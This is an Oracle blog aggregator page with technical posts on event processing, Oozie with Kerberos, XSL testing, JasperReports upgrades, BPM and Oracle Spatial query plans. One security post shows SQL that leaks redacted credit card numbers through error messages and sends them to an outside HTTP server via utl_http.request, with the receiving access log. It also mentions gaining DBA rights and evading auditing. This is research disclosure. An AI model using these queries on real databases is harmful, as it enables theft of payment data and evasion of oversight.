Feed aggregator

Role and Tool for Real Time Processing in IoT

Anshu Sharma - Fri, 2013-11-22 13:34

Everyone acknowledges that IoT will improve our productivity by automating mundane tasks like getting relevant information from a machine to a Cloud Service for Repair or Replenishment. A large number of folks also agree that Big Data has an important role to play, for example crunching data from hundreds of sensors in a turbine and predicting failures. However, relatively few folks understand the role of Real Time processing in the Internet of Things. After all, if I have the ability to reduce my usage-based automobile insurance premium, I would appreciate an alert to change my behavior while I am still in the middle of my long drive, instead of a monthly report.

If Real Time Processing of data was difficult in simple transactional systems, consider the complexity when you are dealing with streaming data and have to combine multiple data sources, like the information about my trip and the data coming in constantly from the Telematics module in my car. So you have to learn a new tool. While you might be familiar with Hadoop, you should also familiarize yourself with Storm, which makes it easy to reliably process unbounded streams of data, doing for real-time processing what Hadoop did for batch processing.

Oracle's solution for building applications that process streaming data in real time is Oracle Event Processing (OEP). Oracle also offers a lighter-weight version of OEP for embedded development on ARM and x86 devices, such as Home Automation Gateways, Smart Meter Aggregators, Healthcare Hubs and Industrial Gateways. If you can make a decision without needing any more data from the backend, why not make it at the Gateway/Aggregator level instead of sending all the streaming data back to the data center? You might still need to send the data back for other use cases, but at least your real-time decision-making latency is reduced considerably.

So what are the strengths of OEP? Here are some key points:

1) OEP provides infrastructure and guidelines for developers to create scalable and highly available Event processing networks (EPN).

2) OEP provides out-of-the-box adapters for easily consuming data coming in different protocols and formats. Of course you are free to write your own adapters.

3) Oracle CQL is a rich, formalized query language optimized for concise expression of temporal queries, similar to how SQL is optimized for expression of static data queries (an illustrative query follows this list). Out-of-the-box functions augment the core language.

4) Oracle CQL is augmented by a data cartridge framework allowing you to tightly integrate other domain data types and functions. The following data cartridges are available – Oracle Java, Oracle Spatial, Oracle JDBC, Hadoop. The Oracle JDBC cartridge, for example, allows you to write applications merging streaming data with the geo-fencing functions available from Oracle Spatial or the predictive analytics capabilities of Oracle Advanced Analytics.

5) Pre-integration with Oracle Coherence for local and distributed caching. You can integrate a cache system with your Oracle Event Processing application so that the cache is available as a source or destination for data your application uses, including event data. Integrating a cache can provide access to relatively static data at a speed that is well suited to an application that handles streaming data.

6) Persist the events that flow out of a component of the EPN to a store and then play them back at a later stage. This helps debug a problem with a currently running application. If you have been recording the events at a node in the EPN when the problem occurred, you can later play back the same list of events to recreate the problem scenario for debugging purposes.

7) OEP Visualizer is a rich Web 2.0 application that displays OEP Data in a useful and intuitive way for admins e.g. latency and throughput graphs display the amount of time it takes an event to pass through the specified stage or path in the EPN or the number of events passing through, respectively. EPN Configurations can be changed through the Visualizer. All this can also be done programmatically through available JMX APIs.

8) The OEP architecture is highly modular, based on OSGi. Adapters and other components involved in implementing data feeds can be dynamically configured/activated/suspended via a lifecycle API (SuspendableBean, ResumableBean). Changes can be made dynamically to CQL queries. In business implementations, business rules are very dynamic, so this also limits the testing required for changes.

9) OEP integrates well with Oracle SOA.  It is available as a part of Oracle SOA Suite and can be used in SOA Composites. 
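As an illustration of point 3, here is a sketch of the kind of query you can express in Oracle CQL; the stream and attribute names (vehicleStream, vehicleId, speed) are hypothetical:

SELECT vehicleId, AVG(speed) AS avgSpeed
FROM vehicleStream [RANGE 60 SECONDS]
GROUP BY vehicleId
HAVING AVG(speed) > 120

Over a sliding 60-second window this continuously emits, per vehicle, the average speed whenever it exceeds 120, which is exactly the kind of temporal aggregation that is awkward to express with plain SQL over static tables.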

So explore the role of real-time processing in your IoT application with OEP and share with us what cool applications you come up with. Fast Data enabled by OEP brings more value to high-velocity sensor/device data. This enables new services, a better customer experience, improved efficiency and higher quality in operations.

Using Oozie in Kerberized Cluster

Chen Shapira - Fri, 2013-11-22 09:14

In general, most Hadoop ecosystem tools work rather transparently in a kerberized cluster. Most of the time things “just work”. This includes Oozie. Still, when things don’t “just work”, they tend to fail with slightly alarming and highly ambiguous error messages. Here are a few tips for using Oozie when your Hadoop cluster is kerberized. Note that this is a client/user guide. I assume you already followed the documentation on how to configure the Oozie server in the kerberized cluster (or you are using Cloudera Manager, which magically configures it for you).

    1. As always, use “kinit” to authenticate with Kerberos and get your tgt before trying to run oozie commands. Verify with klist. Failure to do this will result in “No valid credentials provided (Mechanism level: Failed to find any Kerberos tgt)”
    2. I always enable security debug messages. This helps me troubleshoot, and also helps when I need to ask support/mailing list for help.
      export HADOOP_ROOT_LOGGER=TRACE,console;
      export HADOOP_JAAS_DEBUG=true;
      export HADOOP_OPTS="-Dsun.security.krb5.debug=true"
    3. Your Oozie command typically contains a URL. Something like “oozie job -oozie http://myserver:11000/oozie -config job.properties -run”. The server name in the URL must match an existing principal name in Kerberos. If your principals are actually “myserver.mydomain.com” make sure you use that in the URL.
    4. If you decide to use CURL to connect to your Oozie server, either for troubleshooting or for using the REST API, don’t forget to use “–negotiate -u foo:bar”. The actual username and password don’t matter (you are authenticating with your Kerberos ticket), but CURL throws a fit if they don’t exist.
    5. If you have Hive action in your Oozie workflow, you need to define and use credentials. Here’s an example:
      <workflow-app xmlns="uri:oozie:workflow:0.2.5" name="example-wf">
              <credentials>
                      <credential name='hive_credentials' type='hcat'>
                              <property>
                                  <name>hcat.metastore.uri</name>
                                  <value>thrift://metastore_server:9083</value>
                              </property>
                              <property>
                                  <name>hcat.metastore.principal</name>
                                  <value>hive/_HOST@KERBDOM.COM</value>
                              </property>
                      </credential>
              </credentials>
      <start to="hive-example"/>
      <action name="hive-example" cred="hive_credentials">
              <hive xmlns="uri:oozie:hive-action:0.2">
                      <job-tracker>${jobTracker}</job-tracker>
                      <name-node>${nameNode}</name-node>
                      <job-xml>${hiveSiteXML}</job-xml>
                      <script>${dbScripts}/hive-example.hql</script>
              </hive>
              <ok to="end"/>
              <error to="fail"/>
      </action>
      <kill name="fail">
              <message>Workflow failed, error message[${wf:errorMessage(wf:lastErrorNode())}]</message>
      </kill>
      <end name="end"/>
      </workflow-app>
      
    6. To make step #5 actually work (i.e. allow Oozie to run Hive actions), you will also need to do the following in Cloudera Manager (CM):
    7. Go to “HDFS Service->Configuration->Service-Wide->Advanced->Cluster-wide Configuration Safety Valve for core-site.xml” and add:

      <property>
      <name>hadoop.proxyuser.oozie.hosts</name>
      <value>*</value>
      </property>
      <property>
      <name>hadoop.proxyuser.oozie.groups</name>
      <value>*</value>
      </property>
      

      – go to “Oozie service->Configuration->Oozie Server(default)->Advanced-> Oozie Server Configuration Safety Valve for oozie-site.xml” and add:

      <property>
      <name>oozie.credentials.credentialclasses</name>
      <value>hcat=org.apache.oozie.action.hadoop.HCatCredentials</value>
      </property>
      

      – Deploy client configuration and restart Hive service and Oozie service.

    8. Oozie doesn’t kinit a user for you on the node it’s launching the action on, and it doesn’t move principals and tickets around. Instead it uses delegation tokens. If you want to authenticate to Hadoop inside a shell or Java action, you’ll need to use the same tokens.

      In a shell action, it will be something like:

      if [ -z "${HADOOP_TOKEN_FILE_LOCATION}" ]
      then
      	hive -e "select x from test" -S
      else
      	hive -e "SET mapreduce.job.credentials.binary=$HADOOP_TOKEN_FILE_LOCATION; select x from test" -S
      fi
      

      In Java it will be:

      if (System.getenv("HADOOP_TOKEN_FILE_LOCATION") != null) {
                  jobConf.set("mapreduce.job.credentials.binary", System.getenv("HADOOP_TOKEN_FILE_LOCATION"));
      }
      

    Hope this helps! Feel free to comment with questions, especially if you ran into errors that I did not address. I’ll be happy to add more tips to the list.


Categories: DBA Blogs

Best of Oracle Security 2013

Alexander Kornbrust - Fri, 2013-11-22 01:51

I just uploaded my DOAG 2013 presentation "Best of Oracle Security 2013".

 

This presentation shows how to bypass Oracle Data Redaction, become DBA using CREATE ANY INDEX, hide information from Oracle Auditing using VPD, and more…

—————————————————

SQL> select * from scott.credit_card where 1=ordsys.ord_dicom.getmappingxpath((card_id),user,user);

ERROR at line 1:

ORA-53044: invalid tag: 1234-1234-1234-1234
ORA-06512: at "ORDSYS.ORDERROR", line 5
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 1394
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 479
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 8232
ORA-06512: at "ORDSYS.ORD_DICOM", line 756
ORA-06512: at line 1

 

or

 

select * from credit_card where 1=length(utl_http.request('http://192.168.2.102:8080/'||card_id));

==> bypassing the obfuscation because the utl_http.request is located in the where clause

 

——– output from access.log ————

192.168.2.101 - - [13/Sep/2013:15:19:20 Central Europe Daylight Time] "GET /1234-1234-1234-1234 HTTP/1.1" 404 35 - -

192.168.2.101 - - [13/Sep/2013:15:19:20 Central Europe Daylight Time] "GET /5678-5678-5678-5678 HTTP/1.1" 404 35 - -

——– output from access.log ————

—————————————————

 

Desktop Testing XSL

Tim Dexter - Thu, 2013-11-21 23:05

Bit of a corner case this week but I wanted to park this as much for my reference as yours. Need to be able to test a pure XSL template against some sample data? That's an XSL template that is going to generate HTML, text or XML. The Template Viewer app in the BI Publisher Desktop group does not offer that as an option. It does offer XSL-FO processing though.

A few minutes digging around in the java libraries and I came up with a command line solution that is easy to set up and use.

1. Place your sample XML data and the XSL template in a directory
2. Open the lib directory where the TemplateViewer is installed. On my machine that is d:\Oracle\BIPDesktop\TemplateViewer\lib
3. Copy the xmlparserv2.jar file into the directory created in step 1.
4. Use the following command in a DOS/Shell window to process the XSL template against the XML data.

java -cp ./xmlparserv2.jar oracle.xml.parser.v2.oraxsl fileX.xml fileY.xsl > fileX.xls


The file generated will depend on your XSL. For an Excel output, you would instruct the process to generate fileX.xls in the same folder. You can then test the file with Excel, a browser or a text editor. Now you can test on the desktop until you get it right without the overhead of having to load it to the server each time.

To be completely clear, this approach is for pure XSL templates that are designed to generate text, html or xml. It's not for the XSLFO templates that might be used at runtime to generate PDF, PPT, etc. For those you should use the Template Viewer application; it supports the XSLFO templates but not the pure XSL templates.

If your template falls into the pure XSL category but the command still fails, this will be down to you using some BIP functionality in the template. To get it to work you'll need to add the Publisher libraries that contain those functions, e.g. xdo-core.jar, i18nAPI_v3.jar, etc., to the classpath argument (-cp).

So a new command including the required libraries might look like:

java -cp ./xmlparserv2.jar;./xdo-core.jar;./i18nAPI_v3.jar 
                            oracle.xml.parser.v2.oraxsl fileX.xml fileY.xsl > fileX.xls

You will need to either move the libraries to the local directory (my assumption above) or include the full path to them. More info here on setting the -cp attribute.

Categories: BI & Warehousing

Save $250 on Kscope14 Registration Now!

Tim Tow - Thu, 2013-11-21 17:17
If you work in the Essbase, Oracle EPM, or Oracle BI world, *the* place to be every June is the annual Kscope conference.  Registration is open for the next conference, Kscope14, coming next June in Seattle, WA.  If you are not currently a full ODTUG member, let me tell you how you can save $250 on the $1650 registration fee.

There are two steps you have to take to "save big".  First, become a full member of ODTUG for $99 and enjoy all of the benefits, including access to a members-only presentations library, throughout the year.  Next, register for Kscope14 and you are eligible for the members-only price of $1500 for a savings of $150.  While you are registering, simply use the code AOLAP to get an additional $100 discount!

My company, Applied OLAP, is one of the top-tier Platinum Sponsors of Kscope14 and I will be there.  I hope to see you at the conference and, if you were able to save some money by using our exclusive AOLAP code, be sure to stop by our booth, say hello, and learn how the Dodeca Spreadsheet Management System can help your company reduce spreadsheet risk, increase spreadsheet accuracy, and reduce costs.
Categories: BI & Warehousing

Upgrading the JasperReports libraries to 5.2.0

Dietmar Aust - Thu, 2013-11-21 09:41
Would you like to upgrade your existing JasperReportsIntegration with the 5.2.0 libraries of JasperReports?

As of now this is already not the most current version; JasperReports has moved on to 5.5.0. But since I created the 5.2.0 package a while ago, I might just post the instructions here. The 5.5.0 version will follow.

Here you go ...

This is an updated version of the original instructions found here: http://daust.blogspot.de/2013/01/upgrading-jasperreports-libraries-to-501.html

Step 1: Download the library files for 5.2.0
You can download the files here:


Step 2: Shut down the Apache Tomcat J2EE server

Step 3: Remove the existing JasperReports libraries from your existing installation
Typically, after you have installed your previous version of the JasperReportsIntegration toolkit (for example version 4.7.0 of JasperReports) on your Apache Tomcat J2EE server, the files will be located in the directory $CATALINA_HOME/webapps/JasperReportsIntegration/WEB-INF/lib, where $CATALINA_HOME represents the path to your Tomcat installation.

You have to remove these libraries first. In this directory you should find two removal scripts: _jasper-reports-delete-libs-4.7.0.sh and _jasper-reports-delete-libs-4.7.0.cmd, for *nix and Windows respectively. On *nix systems you have to make the script executable first, e.g.: chmod u+x _jasper-reports-delete-libs-4.7.0.sh. Then you can call it and it will remove all files for version 4.7.0. It will NOT remove the files for the JasperReportsIntegration itself or any other libraries which YOU might have placed there deliberately.

You can always find the required removal scripts here: http://www.opal-consulting.de/downloads/free_tools/JasperReportsLibraries/ .

Whenever I release another package, the removal scripts for that package will be shipped as well.

Step 4: Install the new 5.2.0 libraries
Now you can just copy the new libraries from JasperReportsLibraries-5.2.0.zip into $CATALINA_HOME/webapps/JasperReportsIntegration/WEB-INF/lib.
 Step 5: Start the Apache Tomcat J2EE server again
Now your system should be upgraded to JasperReports 5.2.0!

Just drop me a note when you need updated libraries for a later JasperReports version, etc. I have scripts in place to create a new package of the libraries.

Here you can find the notes from my upgrade (4.5.0 => 4.8.0) on Linux to illustrate the process; I hope it makes sense:

**
** download the libraries from:
**  http://www.opal-consulting.de/downloads/free_tools/JasperReportsLibraries/4.8.0/JasperReportsLibraries-4.8.0.zip
** to /home/jasper/JasperReportsLibraries

cd /home/jasper
mkdir JasperReportsLibraries

** unzip them
cd JasperReportsLibraries
unzip JasperReportsLibraries-4.8.0.zip -d JasperReportsLibraries-4.8.0

** stop tomcat server
/home/jasper/tomcat/bin/shutdown.sh

** remove libraries of current jasper reports release
cd /home/jasper/tomcat/webapps/JasperReportsIntegration/WEB-INF/lib
chmod +x _jasper-reports-delete-libs-4.5.0.sh
dos2unix _jasper-reports-delete-libs-4.5.0.sh

./_jasper-reports-delete-libs-4.5.0.sh

** copy libraries of the new release to the WEB-INF/lib directory
cp /home/jasper/JasperReportsLibraries/JasperReportsLibraries-4.8.0/* /home/jasper/tomcat/webapps/JasperReportsIntegration/WEB-INF/lib

** restart tomcat
/home/jasper/tomcat/bin/startup.sh


Cheers,
~Dietmar.

How to Make File-Based MDS in JDeveloper Work for both Windows and Linux

Jan Kettenis - Wed, 2013-11-20 10:52
In this article I explain how you can modify the JDeveloper adf-config.xml file to make it work for both Windows and Linux.

If in a JDeveloper application you point to artifacts in a file-based MDS residing in a Windows folder, for example "d:\projects\MDS", then JDeveloper will create a new entry in the adf-config.xml file (which you can find in Application Resources -> Descriptors -> ADF META-INF) pointing to the absolute location of that folder:



The problem with this is that if you have other colleagues that use Linux instead of Windows, it's not possible to make it work for both by defining some relative location (as you could do with ant), like "../../projects/MDS", so now what?

As in most cases, the solution is so simple that I successfully missed it many times: use an environment variable! What worked was creating an environment variable with name MDS_HOME, and after that I could use it like this:
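The screenshots from the original post are not reproduced here; as a sketch, the relevant adf-config.xml entry boils down to something like the following. The metadata-store-usage id is illustrative, while the FileMetadataStore class name and metadata-path property are the ones normally used for a file-based MDS store:

<!-- absolute Windows path, as generated by JDeveloper -->
<metadata-store-usage id="mdsRepos">
  <metadata-store class-name="oracle.mds.persistence.stores.file.FileMetadataStore">
    <property name="metadata-path" value="d:\projects\MDS"/>
  </metadata-store>
</metadata-store-usage>

<!-- the same entry using the MDS_HOME environment variable, usable on Windows and Linux -->
<metadata-store-usage id="mdsRepos">
  <metadata-store class-name="oracle.mds.persistence.stores.file.FileMetadataStore">
    <property name="metadata-path" value="${MDS_HOME}"/>
  </metadata-store>
</metadata-store-usage>

With the second form, each developer only needs to define MDS_HOME to point at their local copy of the MDS folder.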

Problem solved! Such an environment variable can be created on Windows as well as Linux.

I have not yet fully tested if this works for everything, like deploying with ant, but if it doesn't I expect you can easily fix that by modifying the ant-sca-compile.xml file in your JDeveloper installation folder by adding a property "mds_home" in there as well.

Customizing (or rather Hacking) Oracle BPM 11g Business Exceptions

Jan Kettenis - Wed, 2013-11-20 02:05
In this article I explain how you can add custom attributes to Oracle BPM 11g business exceptions. Mind that this is not officially supported.

One of the fun things of giving a training like the Advanced BPM Suite 11g course that I'm running now, is that students ask questions to which you don't know the answer. But hey, you are the teacher, and that won't do, so off you go!

One question asked yesterday was whether it is possible to have more attributes on a business exception than just "errorInfo". The first question should be: "why do you want that?". Well, let's assume that at some higher level you want to have access to context information that is only available where the exception is thrown, like a local variable. Of course you can concatenate all the info into one long semicolon-separated string or something, but then you probably need other logic to turn that back into something readable.

If you look closely at the definition of a business exception, you will notice that it uses a generated WSDL and XSD. What I did was add an extra element "name" to the XSD of a business exception named FailProcess (created for the previous blog article) as follows:
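The screenshot is not reproduced here; as a sketch, the change amounts to something like the following in the generated XSD for the FailProcess exception. The errorInfo element is the attribute the exception already has; the name element is the manual addition (the exact types and structure JDeveloper generates may differ):

<xsd:element name="FailProcess">
  <xsd:complexType>
    <xsd:sequence>
      <xsd:element name="errorInfo" type="xsd:string"/>
      <!-- manually added element, not generated by JDeveloper -->
      <xsd:element name="name" type="xsd:string"/>
    </xsd:sequence>
  </xsd:complexType>
</xsd:element>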


I then restarted JDeveloper to see what would happen, and not totally to my surprise: nothing! As in: it works! I also tried it run-time, and no problem there either, as you can see in the following figure:


One warning though. As the generated XSD clearly states, it should not be altered manually, and any change may be overwritten. The hack I show you here is obviously not supported, and you should expect that any change to the business exception via the UI will break your code. Therefore let's hope that changes like this are supported by JDeveloper in some future version as well.

Why you may consider NOT using the Terminate End Event in Oracle BPM Suite

Jan Kettenis - Tue, 2013-11-19 10:47
In this article I explain why you should try to avoid using the Terminate End Event in Oracle BPM 11g.

According to the BPMN specification, the Terminate End Event is supposed to terminate a process instance at the level at which it is raised, including any ongoing activity for sub-processes. But it should not terminate any higher-level (parent) process.

With OBPM 11g it works differently (at least up to PS6), as raising a Terminate End Event will actually terminate the composite's instance. Except for human tasks, because as clearly stated in the documentation: "Human tasks are independent from BPMN processes. If you terminate a BPMN process while it runs a user task, the associated human tasks keeps running independently". The reason is that the human workflow engine runs separately from the BPM engine.

In the process below this will result in the situation that the Review Data task will still show in Workspace, while the associated process instance is already terminated. That was not the original intention of this model.


This flow shows what actually happens:


Conclusion: before considering using the Terminate End Event, be well aware of its behavior. Consider alternate types of modeling, like raising a business exception that is caught by the parent process, which then uses an Update Task activity to withdraw all human tasks before actually ending. In this way you can prevent anyone from accidentally doing work for nothing.

Such a model would look like this:


Resizing MGMT_TABLESPACE in Grid Control 12c

Bas Klaassen - Mon, 2013-11-18 07:06
We noticed the MGMT_TABLESPACE in our 12c Grid Control instance was very big. Almost 380 GB of data was stored in this tablespace. Because of all the targets registered in this Grid Control instance and the frequent usage of this Grid Control, I did not think anything was wrong. Until someone looked into this and found out it was a bug in 12c... Note 1502370.1 describes this bug and also the
Categories: APPS Blogs

A day in Kunming China

Arvind Jain - Sun, 2013-11-17 09:08
Kunming is an important location for transit passengers traveling via China Eastern. I had an unplanned 24-hour stay and I am glad that I found a reasonable accommodation. So for those who are looking for a simple, straightforward transit stay in Kunming, Dhaka Hotel, Ph# 135 2933 2392, is a good option if you are on a budget. They have WiFi, airport transfer and South Asian food options.

Creating your own Virtualbox Development Images

Edwin Biemond - Sat, 2013-11-16 15:11
For my Oracle Puppet provisioning development I can't do without these image creation tools: Packer and Vagrant, in combination with Oracle VirtualBox or VMware. In this blogpost I will explain what these tools can do for you, how you can make your own images, and how to use Puppet as the provisioning tool. With Vagrant you can create your own virtual images and it can start Puppet or Chef to do all the

Playing with Oracle Spatial - An important consideration when using SDO_NN operator

Mihajlo Tekic - Fri, 2013-11-15 23:27

I've been playing with Oracle Spatial quite a bit lately and ran into some interesting things that I  plan to write about in the next couple of posts.

This post covers an important consideration, I think, that one should make when using the SDO_NN spatial operator with the sdo_num_res parameter.

But first, just briefly on the operator itself. The SDO_NN operator is used to identify the nearest neighbors of a particular geometry. The full operator synopsis can be found in the official documentation.

Please note, the database I use in the examples below is Oracle 11.2.0.3.0 Enterprise Edition with no additional patches applied and default Oracle Spatial settings.

Let's consider the following example, there is a table RESTAURANTS having only an id and a geometry column (point).

 CREATE TABLE restaurants
(
id NUMBER NOT NULL,
point MDSYS.SDO_GEOMETRY
);

ALTER TABLE restaurants ADD CONSTRAINT restaurants_pk PRIMARY KEY (id);


Let's create a spatial index on the restaurants.point column:

 INSERT INTO user_sdo_geom_metadata 
( TABLE_NAME
, COLUMN_NAME
, DIMINFO
, SRID)
VALUES
( 'restaurants'
, 'POINT'
, SDO_DIM_ARRAY(
SDO_DIM_ELEMENT('X', 0, 10000000, 0.005),
SDO_DIM_ELEMENT('Y', 0, 10, 0.005)
)
, null -- SRID
);

CREATE INDEX restaurants_sidx ON restaurants(point) INDEXTYPE IS MDSYS.SPATIAL_INDEX;


For simplicity let's say there are 500,000 restaurants distributed on a single line (x-axis of two dimensional coordinate system, y=0, x=1,2,3,...500,000).

INSERT INTO restaurants 
(SELECT rownum --id
, SDO_GEOMETRY(
2001 -- 2 dimensional point
, null -- SDO SRID
, SDO_POINT_TYPE(rownum,0,null) -- x=rownum, y=0
, null
, null
)
FROM dual CONNECT BY rownum<=500000
);

In order to find the first 5 nearest neighbors to point (10,0) one could use the following spatial query:

SQL> SELECT p.id, sdo_nn_distance(1) distance
2 FROM restaurants p
3 WHERE SDO_NN(p.point,
4 SDO_GEOMETRY(
5 2001 -- 2 dimensional point
6 , null
7 , SDO_POINT_TYPE(10,0,null)
8 , null
9 , null
10 ),
11 'sdo_num_res=5',
12 1
13 )='TRUE'
14* ORDER BY 2;

ID DISTANCE
---------- ----------
10 0
9 1
11 1
12 2
8 2

SQL>

Now suppose each restaurant has 5 menu items that are stored in the MENU_ITEMS table. The table has 4 columns: a unique identifier, id; a reference to the RESTAURANTS table, restaurants_id; an identifier of the item within the restaurant menu, item_number; and lastly a description, a 100-character column that I use in this example to make the table a bit bigger.

CREATE TABLE menu_items
(id NUMBER NOT NULL,
restaurants_id NUMBER NOT NULL,
item_number NUMBER NOT NULL,
description varchar2(100)
);

ALTER TABLE menu_items ADD CONSTRAINT menu_items_pk PRIMARY KEY (id);

ALTER TABLE menu_items ADD CONSTRAINT menu_items_rest_fk FOREIGN KEY (restaurants_id) REFERENCES restaurants(id);

CREATE INDEX menu_items_restaurants_idx ON menu_items(restaurants_id);


INSERT INTO menu_items
(SELECT rownum
, b.rn
, a.rn
, rpad(rownum,100,'A')
FROM
(SELECT rownum rn FROM dual CONNECT BY rownum<=5) a, --5 menu items per rest.
(SELECT rownum rn FROM dual CONNECT BY rownum<=500000) b
);

commit;

Suppose you want to get the menu items of the top 5 nearest restaurants to a particular location, (10,0) for example. One way would be with the following spatial query (but first, of course, collect the necessary stats):

BEGIN
DBMS_STATS.GATHER_TABLE_STATS(ownname=>user,tabname=>'restaurants',cascade=>TRUE);
DBMS_STATS.GATHER_TABLE_STATS(ownname=>user,tabname=>'menu_items',cascade=>TRUE, method_opt=>'FOR ALL INDEXED COLUMNS SIZE AUTO');
END;

SELECT t1.id
, t2.id
, t2.restaurants_id
, t2.item_number
FROM restaurants t1
, menu_items t2
WHERE t1.id=t2.restaurants_id
AND SDO_NN(t1.point,
SDO_GEOMETRY(
2001 -- 2 dimensional point
, null
, SDO_POINT_TYPE(10,0,null)
, null
, null
),
'sdo_num_res=5',
1
)='TRUE'
ORDER BY t1.id, t2.item_number;


The query produces the desired result. However, let's look at how it performed. I re-ran the query, but this time I used the gather_plan_statistics hint to get the execution statistics for the query.

SQL>SELECT /*+ gather_plan_statistics */ t1.id, t2.id, t2.restaurants_id, t2.item_number
2 FROM restaurants t1
3 , menu_items t2
4 WHERE t1.id=t2.restaurants_id
5 AND SDO_NN(t1.point,
6 SDO_GEOMETRY(
7 2001 -- 2 dimensional point
8 , null
9 , SDO_POINT_TYPE(10,0,null)
10 , null
11 , null
12 ),
13 'sdo_num_res=5',
14 1
15 )='TRUE'
16 ORDER BY t1.id, t2.item_number;

ID ID RESTAURANTS_ID ITEM_NUMBER
---------- ---------- -------------- -----------
8 8 8 1
8 500008 8 2
8 1000008 8 3
8 1500008 8 4
8 2000008 8 5
9 9 9 1
9 500009 9 2
9 1000009 9 3
9 1500009 9 4
9 2000009 9 5
10 10 10 1
10 500010 10 2
10 1000010 10 3
10 1500010 10 4
10 2000010 10 5
11 11 11 1
11 500011 11 2
11 1000011 11 3
11 1500011 11 4
11 2000011 11 5
12 12 12 1
12 500012 12 2
12 1000012 12 3
12 1500012 12 4
12 2000012 12 5

25 rows selected.


The query took 1.32 seconds to complete as you can see from the execution statistics:

SQL> SELECT * FROM TABLE(dbms_xplan.display_cursor(null,null,'ALLSTATS LAST'));

PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
SQL_ID gwpqub3k0awqm, child number 0
-------------------------------------
SELECT /*+ gather_plan_statistics */ t1.id, t2.id, t2.restaurants_id,
t2.item_number FROM restaurants t1 , menu_items t2 WHERE
t1.id=t2.restaurants_id AND SDO_NN(t1.point, SDO_GEOMETRY(
2001 -- 2 dimensional point , null ,
SDO_POINT_TYPE(10,0,null) , null , null ),
'sdo_num_res=5', 1 )='TRUE' ORDER BY t1.id, t2.item_number

Plan hash value: 2076547507


PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | Reads | OMem | 1Mem | Used-Mem |
------------------------------------------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 25 |00:00:01.32 | 41540 | 41465 | | | |
| 1 | SORT ORDER BY | | 1 | 24678 | 25 |00:00:01.32 | 41540 | 41465 | 2048 | 2048 | 2048 (0)|
|* 2 | HASH JOIN | | 1 | 24678 | 25 |00:00:01.32 | 41540 | 41465 | 1517K| 1517K| 886K (0)|
| 3 | TABLE ACCESS BY INDEX ROWID| RESTAURANTS | 1 | 5000 | 5 |00:00:00.01 | 64 | 0 | | | |
|* 4 | DOMAIN INDEX | RESTAURANTS_SIDX | 1 | | 5 |00:00:00.01 | 63 | 0 | | | |
| 5 | TABLE ACCESS FULL | MENU_ITEMS | 1 | 2500K| 2500K|00:00:00.62 | 41476 | 41465 | | | |
------------------------------------------------------------------------------------------------------------------------------------------------


PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Predicate Information (identified by operation id):
---------------------------------------------------

2 - access("T1"."ID"="T2"."RESTAURANTS_ID")
4 - access("MDSYS"."SDO_NN"("T1"."POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL),'sdo_num_res=5',1)='
TRUE')


29 rows selected.

SQL>


The problem

Well, one could say that 1.32 seconds is not that bad. However, if you look at the plan more carefully you will notice that the CBO used a HASH JOIN to join the RESTAURANTS and MENU_ITEMS tables and, as a result, performed a full table scan on MENU_ITEMS. Now imagine if the MENU_ITEMS table were quite big (suppose it stored the items of all restaurants across the US)?!

What made the CBO pick a HASH JOIN? Look at the estimated (5,000) vs. actual (5) rows selected from the RESTAURANTS table. We were only after the 5 nearest neighbors, since we used sdo_num_res=5 in our SDO_NN call. One could expect the CBO to recognize that fact and estimate a cardinality of 5. But no, the CBO applied a selectivity of 1% (500,000 restaurants x 1% = 5,000).

Why selectivity of 1%?

SDO_NN is an operator that is bound to the implementation of the function NN that is part of PRVT_IDX package owned by MDSYS.

By default, statistics for the PRVT_IDX package are defined by the SDO_STATISTICS type. That is, the Extensible Optimizer feature is used to define how cardinality and cost are calculated for the functions/procedures defined in the package (if no statistics are associated, the CBO uses a default selectivity of 1%).

It seems the logic implemented in the ODCIStatsSelectivity() function is not smart enough to detect that we are only after the first N rows, as defined by the SDO_NUM_RES parameter.

You can clearly see this if you create a 10053 trace file and look at the section where the MDSYS.SDO_STATISTICS.ODCIStatsSelectivity procedure is used to calculate selectivity.



MDSYS.SDO_STATISTICS.ODCIStatsFunctionCost returned:
CPUCost : 100000000000000
IOCost : 100000000000000
NetworkCost : -1
Calling user-defined selectivity function...
predicate: "MDSYS"."SDO_NN"("T1"."POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL),'sdo_num_res=5',1)='TRUE'
declare
sel number;
obj0 "MDSYS"."SDO_GEOMETRY" := "MDSYS"."SDO_GEOMETRY"(NULL, NULL, NULL, NULL, NULL);

begin
:1 := "MDSYS"."SDO_STATISTICS".ODCIStatsSelectivity(
sys.ODCIPREDINFO('MDSYS',
'PRVT_IDX',
'NN',
45),
sel,
sys.ODCIARGDESCLIST(sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(2, 'RESTAURANTS', 'TEST', '"POINT"', NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL)),
:3,
:4
, obj0, "MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL), :5,
sys.ODCIENV(:6,:7,:8,:9));
if sel IS NULL then
:2 := -1.0;
else
:2 := sel;
end if;
exception
when others then
raise;
end;
Bind :3 Value 'TRUE'
Bind :4 Value 'TRUE'
Bind :5 Value 'sdo_num_res=5'
ODCIEnv Bind :6 Value 0
ODCIEnv Bind :7 Value 0
ODCIEnv Bind :8 Value 0
ODCIEnv Bind :9 Value 3
MDSYS.SDO_STATISTICS.ODCIStatsSelectivity returned selectivity: 1.00000000%
Table: RESTAURANTS Alias: T1
Card: Original: 500000.000000 Rounded: 5000 Computed: 5000.00 Non Adjusted: 5000.00




